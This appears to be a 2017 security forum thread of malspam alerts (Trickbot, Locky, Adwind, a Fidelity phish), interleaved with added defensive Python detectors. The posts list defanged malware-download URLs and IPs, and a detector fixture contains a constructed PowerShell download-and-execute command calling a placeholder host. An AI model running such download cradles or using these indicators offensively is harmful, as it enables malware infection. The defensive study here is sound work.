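The Trend Micro conclusion quoted above names WMI permanent event subscriptions as the miner's fileless persistence. A defender who dumps the root\subscription namespace gets three object types back (an __EventFilter, a consumer, and a __FilterToConsumerBinding), and the useful check is to join them and look at what each binding actually executes. The following is an added example, not code from Trend Micro or from this forum post: the class and property names are the real WMI ones, while every instance, name and command line in it is constructed for the example.

```python
"""Triage WMI permanent event subscriptions for fileless persistence.

Added example. Joins __EventFilter, consumer and __FilterToConsumerBinding
instances (as they come out of root\\subscription) and flags bindings whose
consumer runs a script host with download or encoded-command arguments.
All instances below are constructed; only the class/property names are real.
"""
import re

FILTERS = [  # constructed __EventFilter instances
    {"Name": "ExampleLogFilter",
     "Query": "SELECT * FROM __InstanceCreationEvent WHERE "
              "TargetInstance ISA 'Win32_NTLogEvent'"},
    {"Name": "UpdaterFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE "
              "TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Minute=15"},
]
CONSUMERS = [  # constructed consumer instances of three real consumer classes
    {"__CLASS": "NTEventLogEventConsumer", "Name": "AuditLogConsumer",
     "CommandLineTemplate": None, "ScriptText": None},
    {"__CLASS": "CommandLineEventConsumer", "Name": "UpdaterConsumer",
     "CommandLineTemplate": "powershell.exe -NoP -W Hidden -enc <base64-omitted>",
     "ScriptText": None},
    {"__CLASS": "ActiveScriptEventConsumer", "Name": "CleanupScript",
     "CommandLineTemplate": None,
     "ScriptText": 'Set fso = CreateObject("Scripting.FileSystemObject")'},
]
BINDINGS = [  # constructed __FilterToConsumerBinding instances
    {"Filter": '__EventFilter.Name="ExampleLogFilter"',
     "Consumer": 'NTEventLogEventConsumer.Name="AuditLogConsumer"'},
    {"Filter": '__EventFilter.Name="UpdaterFilter"',
     "Consumer": 'CommandLineEventConsumer.Name="UpdaterConsumer"'},
    {"Filter": '__EventFilter.Name="UpdaterFilter"',
     "Consumer": 'ActiveScriptEventConsumer.Name="CleanupScript"'},
]

SCRIPT_HOSTS = re.compile(
    r"\b(powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32)(\.exe)?\b", re.I)
SUSPICIOUS_ARGS = {
    "encoded command": re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "in-memory download": re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|"
        r"\bIEX\b|Invoke-Expression", re.I),
}


def _ref_name(ref):
    """Pull the Name key out of a WMI object path such as __EventFilter.Name="X"."""
    m = re.search(r'Name="([^"]*)"', ref)
    return m.group(1) if m else None


def _ref_class(ref):
    return ref.split(".", 1)[0]


def triage(filters, consumers, bindings):
    """Return one finding per binding that deserves analyst attention."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    findings = []
    for b in bindings:
        flt = by_filter.get(_ref_name(b["Filter"]))
        con = by_consumer.get((_ref_class(b["Consumer"]), _ref_name(b["Consumer"])))
        if flt is None or con is None:
            findings.append({"filter": b["Filter"], "consumer": b["Consumer"],
                             "reasons": ["binding references a missing filter or consumer"]})
            continue
        reasons = []
        if con["__CLASS"] == "CommandLineEventConsumer":
            cmd = con.get("CommandLineTemplate") or ""
            if SCRIPT_HOSTS.search(cmd):
                reasons.append("consumer launches a script host")
            reasons += [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(cmd)]
        elif con["__CLASS"] == "ActiveScriptEventConsumer":
            # Script text runs inside scrcons.exe with no file on disk: always review.
            reasons.append("ActiveScriptEventConsumer: review ScriptText")
        if reasons:
            findings.append({"filter": flt["Name"], "trigger": flt["Query"],
                             "consumer": con["Name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(FILTERS, CONSUMERS, BINDINGS):
        print(f["consumer"], "<-", f["filter"], ":", "; ".join(f["reasons"]))
```

The join matters more than the regexes: a consumer that never appears in a binding never fires, and a binding pointing at a consumer that no longer exists is itself a sign that something was cleaned up by hand. On a real host the same three lists come from the root\subscription namespace; the regex list is a starting point to extend, not a complete signature set.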

  7. #1297
    AplusWebMaster (Adviser Team)

    Fake 'invoice', 'eFax' SPAM

    FYI...

    Fake 'invoice' SPAM - delivers Locky
    - https://myonlinesecurity.co.uk/fake-...ky-ransomware/
    7 Nov 2017 - "... an email with a subject of 'Invoice #231910390' (random numbers) pretending to come from XXDocumentSend at your own email address or company domain... Once again the word doc contains an embedded OLE object that when clicked on opens a PowerShell script which contacts a remote server & gets a text string which contains a set of instructions to contact a list of urls in turn, until one responds, to download the main Locky ransomware or Trickbot binary...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...0390-email.png

    ... over the last couple of weeks or so the downloaders from the Necurs botnet used system fingerprinting to decide which malware to give to any victim. Certain countries and IP ranges got Locky, others got Trickbot banking trojan. I am pretty sure that these Word embedded OLE downloaders and the downloaders will also be using the same techniques:
    > https://myonlinesecurity.co.uk/wp-co...ole-object.png

    115403772_11_07_2017_14_87_41.doc - Current Virus total detections 11/60*. Payload Security** | contacts
    ‘http ://gotcaughtdui .com/693’ where it downloads to memory the text string which contains these 6 urls
    "http ://teesaddiction .com/JHgd3Dees",
    "http ://christaminiatures .nl/JHgd3Dees",
    "http ://336.linux1.testsider .dk/JHgd3Dees",
    "http ://florastor .net/JHgd3Dees",
    "http ://heinzig .info/JHgd3Dees",
    "http ://muchinfaket .net/p66/JHgd3Dees"
    This delivers wera4.exe (VirusTotal 10/66[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1510048862/
    115403772_11_07_2017_14_87_41.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    132.148.21.213
    217.73.227.10

    Contacted Hosts
    132.148.21.213
    217.73.227.10


    3] https://www.virustotal.com/en/file/2...35ce/analysis/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'eFax' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    7 Nov 2017 - "An email with the subject of 'You have a new fax' pretending to come from eFax Corporate but actually coming from a look-a-like domain <message@ efax-secure .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-from-eFax.png

    Today’s example of the spoofed domains is, as usual, registered via Godaddy as registrar.
    efax-secure .com hosted on and sending the emails via 134.19.180.224 hosted-by .rapidrdp .com AS49453 Global Layer B.V. | 95.211.214.251 AS60781 LeaseWeb Netherlands B.V.| 185.106.121.147 free.hostsailor .com AS60117 Host Sailor Ltd. | 185.2.81.10 guish.elvb-listverify .com AS49981 WorldStream B.V. |

    HighlyEncryptedFax.doc - Current Virus total detections 3/59*. Payload Security**
    This malware file downloads from
    http ://styleof.co .uk/ser1107.png which of course is -not- an image file but a renamed .exe file that gets renamed to Hmmd.exe (VirusTotal 8/61[3]). An alternative download location is
    http ://tablet-counter .com/ser1107.png
    This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...tedFax_doc.png
    DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/e...is/1510053544/
    HighlyEncryptedFax.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    37.120.182.208
    79.171.39.110
    146.255.32.109

    Contacted Hosts
    79.171.39.110
    146.255.32.109
    37.120.182.208
    176.120.126.21
    194.87.93.48
    62.109.10.76


    3] https://www.virustotal.com/en/file/c...is/1493725297/
    Epvuyf.exe

    Last edited by AplusWebMaster; 2017-11-07 at 14:29.
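Both items in this post describe the same endpoint behaviour: a Word document (via an embedded OLE object or a macro) starts PowerShell, which fetches a payload. The parent-child relationship is what endpoint telemetry sees, and it survives even when the downloader stages through cmd.exe first. The following is an added example, not code from the blog or from this forum: it walks a constructed set of process-creation records shaped like Sysmon Event ID 1 fields and reports script hosts whose ancestry leads back to an Office application. The process tree, command lines and the placeholder URL downloader.example are all constructed.

```python
"""Flag script hosts descended from an Office application.

Added example. Records are constructed in the shape of Sysmon Event ID 1
(ProcessId, ParentProcessId, Image, CommandLine). The chain models the post:
Word -> cmd.exe -> powershell.exe fetching a stage, plus a benign PowerShell
started from Explorer as the contrast. The URL is a labelled placeholder.
"""
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
URL_RX = re.compile(r"https?://[^\s'\"();]+", re.I)

EVENTS = [  # constructed; PIDs are unique within this sample
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "Invoice #231910390.doc"'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "%TEMP%\\run.bat"'},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"$u=(New-Object Net.WebClient)"
                    ".DownloadString('http://downloader.example/693'); IEX $u\""},
    {"ProcessId": 500, "ParentProcessId": 100,   # admin's own interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]


def _exe(image):
    """Lower-cased file name of a Windows image path, independent of host OS."""
    return ntpath.basename(image).lower()


def office_ancestry(pid, by_pid, max_hops=4):
    """Walk ParentProcessId links; return the list of ancestor image names up to
    and including the first Office app, or None if none is found in max_hops.
    Real telemetry should key on ProcessGuid, since PIDs are reused over time."""
    chain = []
    cur = by_pid.get(pid)
    for _ in range(max_hops):
        if cur is None:
            return None
        parent = by_pid.get(cur["ParentProcessId"])
        if parent is None:
            return None
        chain.append(_exe(parent["Image"]))
        if chain[-1] in OFFICE_APPS:
            return chain
        cur = parent
    return None


def detect(events):
    """Return findings for script hosts whose ancestry reaches an Office app,
    with any URLs present on the command line extracted as indicators."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if _exe(e["Image"]) not in SCRIPT_HOSTS:
            continue
        chain = office_ancestry(e["ProcessId"], by_pid)
        if chain:
            findings.append({"pid": e["ProcessId"], "image": _exe(e["Image"]),
                             "chain": chain, "urls": URL_RX.findall(e["CommandLine"])})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["pid"], f["image"], "<-", " <- ".join(f["chain"]), f["urls"])
```

The interactive PowerShell (pid 500) is not reported because its ancestry stops at Explorer, which is the distinction a rule of this kind must make to stay usable on administrator workstations. The hop limit is an assumption; four covers the Word -> cmd -> PowerShell chain described in the post with room for one more intermediary.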

  8. #1298
    AplusWebMaster (Adviser Team)

    Fake 'eFax' SPAM, Drive-by cryptocurrency mining

    FYI...

    Fake 'eFax' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/trick...efax-messages/
    8 Nov 2017 - "... this week the Trickbot gangs have decided to continue with -imitating- eFax to distribute their malware. Unlike yesterday’s version[1], which looked quite realistic, today’s version is quite a pale imitation...
    1] https://myonlinesecurity.co.uk/fake-...anking-trojan/
    This example, an email with the subject of 'You have received a fax message' pretending to come from eFax but actually coming from a series of look-a-like domains <noreply@ faxmessage*** .ml> (*** = 1 to 599) with a malicious word doc attachment, is the second of today’s spoofs of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...e_8_nov_17.png

    faxmessage*** .ml is being hosted on different IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA. In previous phishing and malware scams by this criminal gang they used a range of domain numbers between 1 and 600 over several days, so there could be a lot more to come.

    efax1298357237174_23536.doc - Current Virus total detections 5/60*. Payload Security**
    This malware doc file downloads using PowerShell from
    http ://transfercar24 .de/xjersey/grondbag.png which of course is -not- an image file but a renamed .exe file that gets renamed to slaaen.exe (VirusTotal 18/67***)
    Alternative download site:
    http ://theartofinvestment .co.uk/authentic/grondbag.png
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...3_2425_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/7...is/1510147039/
    efax1298357237174_23536.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    200.47.70.193
    127.0.0.4
    78.47.139.102
    87.106.3.106

    Contacted Hosts
    87.106.3.106
    78.47.139.102
    82.146.62.66
    92.53.67.5


    *** https://www.virustotal.com/en/file/c...is/1510152607/
    grondbag.png.exe

    transfercar24 .de: 87.106.3.106: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/b8...bbd0/analysis/

    theartofinvestment .co.uk: ... A temporary error occurred during the lookup...
    ___

    Drive-by cryptocurrency mining
    > https://www.helpnetsecurity.com/2017...rrency-mining/
    Nov 8, 2017

    (MANY details at the URL above.)

    Last edited by AplusWebMaster; 2017-11-08 at 23:37.

  9. #1299
    AplusWebMaster (Adviser Team)

    Fake 'Resume', 'MoneyGram' SPAM, Fidelity Investments – Phish

    FYI...

    Fake 'Resume' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...liver-malware/
    10 Nov 2017 - "... This is a continuation from these 2 previous posts about malware using resumes or job applications as the lure [1] [2]...
    1] https://myonlinesecurity.co.uk/websi...be-ransomware/
    2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
    ... you can see from the email headers, these pass all authentication checks, so stand quite a good chance of being delivered to a recipient... the web address the word doc downloads from
    http ://89.248.169.136 /bigmac.jpg is exactly the same as reported on 8th October 2017. More than 1 month ago & still live and spewing out malware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...esume_amir.png

    resume.doc - Current Virus total detections 11/59*. Payload Security**...
    This malware downloads from http ://89.248.169.136 /bigmac.jpg which of course is -not- an image file but a renamed .exe ASDlkoa.exe (VirusTotal 18/67[3]) (Payload Security[4])... This word doc looks like this:
    > https://myonlinesecurity.co.uk/wp-co...resume_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/0...is/1510290607/
    resume.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    Hybrid Analysis
    89.248.169.136: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/88...8f9e/analysis/

    3] https://www.virustotal.com/en/file/4...is/1510290556/
    ASDlkoa.exe

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    145.249.104.14
    212.227.91.231

    Contacted Hosts
    212.227.91.231
    145.249.104.14
    104.16.40.2
    216.58.201.228
    216.58.201.238

    ___

    Fake 'MoneyGram' SPAM - Java Adwind delivered
    - https://myonlinesecurity.co.uk/java-...-notice-again/
    10 Nov 2017 - "... mentioned many of these HERE[1]. We have been seeing these sort of emails almost every day and there was nothing much to update. Today’s has a slightly different subject and email content to previous ones. Many Antiviruses on Virus Total normally detect these heuristically...
    1] https://myonlinesecurity.co.uk/?s=java+adwind
    Make Note: JavaAdwind/JavaJacksbot are both very dangerous remote access backdoor Trojans...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-1110_2017.png

    There is -no-attachment- with this malspam campaign, but instead a -link- that activates when you click the image in the email, which downloads
    http ://ferraniguillem .com/MG%20Notice%201110.zip which is NOT a .zip but a .rar file. It will not extract until you -rename- it to rar and then only in WinZip -not- in any other of my extraction tools... eventually extracts to:
    MG Notice 1110.JAR (532kb) Current Virus total detections 15/58*. Payload Security**...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1510301644/
    MG Notice 1110.JAR

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    ferraniguillem .com: 82.98.139.51: https://www.virustotal.com/en/ip-add...1/information/
    > https://www.virustotal.com/en/url/03...b12d/analysis/
    ___

    Fidelity Investments – Phish...
    - https://myonlinesecurity.co.uk/fake-...tice-phishing/
    10 Nov 2017 - "... one we don’t often see in the UK. Fidelity Investments is a US based bank or institution...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...scam-email.png

    If you follow the link-in-the-email
    http ://www.meyvesebze .net/wp-content/plugins/p.php which -redirects- you to
    https ://www.todentists .ca/Site/styles/RtlCust/IdentifyUser/login.php?cmd=login_submit&id=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929&session=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929
    ... you see a webpage looking like this:
    > https://myonlinesecurity.co.uk/wp-co...y_phishing.png

    After you input your User Name and Password, you get forwarded to a page asking for Social security number, Date of Birth, Email Address and Email Password:
    > https://myonlinesecurity.co.uk/wp-co..._phishing2.png

    Then you get a failure page saying “Due to a technical error, the update system is temporarily unavailable. We apologize for the inconvenience. Please try again later”:
    > https://myonlinesecurity.co.uk/wp-co..._phishing3.png

    ... Watch for -any- site that invites you to enter ANY personal or financial information... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... Email Headers and phishing Site information: the From address in the email does-not-exist and is totally made up..."

    meyvesebze .net: 31.186.8.167: https://www.virustotal.com/en/ip-add...7/information/

    todentists .ca: 64.118.86.45: https://www.virustotal.com/en/ip-add...5/information/

    Last edited by AplusWebMaster; 2017-11-10 at 21:27.

  10. #1300
    AplusWebMaster (Adviser Team)

    Fake 'Sage invoice' SPAM

    FYI...

    Fake 'Sage invoice' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    13 Nov 2017 - "An email with the subject of 'Important: Outdated Invoice' pretending to come from Sage but actually coming from a look-a-like or typo-squatted domain <secure@ sage-invoices .com> with a malicious word doc attachment... delivering Trickbot banking Trojan... Today’s example of the spoofed domains is, as usual, registered via Godaddy as registrar.
    sage-invoices .com hosted on 185.2.81.187 | 213.152.162.139 | 185.106.121.134 |

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ed-invoice.png

    SecureMessage.doc - Current Virus total detections 2/60*. Payload Security**...
    This malware file downloads from
    http ://styleof .co.uk/ser1113.png which of course is -not- an image file but a renamed .exe file that gets renamed to yjgeidqce.exe (VirusTotal 11/66***)
    An alternative download location is
    http ://rifweb .co.uk/ser1113.png
    This email attachment contains a genuine word doc with a macro script that when run will infect you.
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...agepay_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/3...1f92/analysis/
    76SagePay.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    127.0.0.2
    79.171.39.110
    146.255.36.1
    127.0.0.4

    Contacted Hosts
    79.171.39.110
    217.194.212.248
    146.255.36.1
    179.43.160.50
    194.87.238.194
    216.177.130.203


    *** https://www.virustotal.com/en/file/2...is/1510574768/
    ser1113.png

    styleof .co.uk: 79.171.39.110: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/47...bbc8/analysis/

    rifweb .co.uk: 217.194.212.248: https://www.virustotal.com/en/ip-add...8/information/
    > https://www.virustotal.com/en/url/14...3ea5/analysis/

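Nearly every post on this page repeats the same observation: a download that is named .png or .jpg is a renamed .exe, and the 'MoneyGram' post adds a .zip that is really a .rar. Content type should be decided from the bytes, not the name, and the posts also write indicators in a defanged form ('http ://styleof .co.uk/...') that has to be undone before they can be fed to a blocklist. The following is an added example, not code from the blog or from this forum: it identifies a file by its leading bytes, reports when the extension disagrees, and refangs the notation used in these posts. The file names come from the posts; the byte contents are constructed stand-ins.

```python
"""Detect extension/content mismatches and refang post-style indicators.

Added example. MAGIC lists well-known leading byte signatures with the
extensions that legitimately carry them; check_extension() reports files
whose name claims something else. refang() reverses the 'http ://dom .tld'
spacing used in the posts. Sample bytes below are constructed.
"""
import re

MAGIC = [  # (signature, type, extensions that legitimately carry it)
    (b"MZ", "Windows executable (MZ/PE)", {"exe", "dll", "scr"}),
    (b"\x89PNG\r\n\x1a\n", "PNG image", {"png"}),
    (b"\xff\xd8\xff", "JPEG image", {"jpg", "jpeg"}),
    (b"Rar!\x1a\x07", "RAR archive", {"rar"}),
    (b"PK\x03\x04", "ZIP container", {"zip", "docx", "xlsx", "jar"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE compound document", {"doc", "xls", "msi"}),
]

SAMPLES = {  # constructed bytes; names taken from the posts above
    "ser1113.png": b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00",
    "MG Notice 1110.zip": b"Rar!\x1a\x07\x01\x00",
    "HighlyEncryptedFax.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8,
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
}


def identify(data):
    """Return (type name, allowed extensions) from the leading bytes.
    An MZ header alone marks a DOS/PE image; a full PE check would also
    read the 'PE\\0\\0' signature at the e_lfanew offset."""
    for sig, kind, exts in MAGIC:
        if data[:len(sig)] == sig:
            return kind, exts
    return "unknown", set()


def check_extension(filename, data):
    """Compare the claimed extension with the detected content type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind, exts = identify(data)
    mismatch = kind != "unknown" and ext not in exts
    return {"file": filename, "claimed": ext, "actual": kind, "mismatch": mismatch}


def scan(samples):
    return [check_extension(name, data) for name, data in samples.items()]


def refang(indicator):
    """Undo the defanging used in the posts: drop whitespace before '.', '/'
    or ':' and after '@', so 'http ://a .b/c' becomes 'http://a.b/c'."""
    return re.sub(r"\s+(?=[./:])|(?<=@)\s+", "", indicator)


if __name__ == "__main__":
    for r in scan(SAMPLES):
        flag = "MISMATCH" if r["mismatch"] else "ok"
        print(f"{r['file']}: claims .{r['claimed']}, is {r['actual']} -> {flag}")
    print(refang("http ://styleof .co.uk/ser1113.png"))
```

At a proxy or mail gateway the same check runs on the response body against the extension in the URL path, which is exactly the case the posts describe: an HTTP response whose first two bytes are MZ should not be delivered as image/png whatever the path says. refang() is meant for the indicator strings only; applied to running prose it would also join ordinary sentences.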
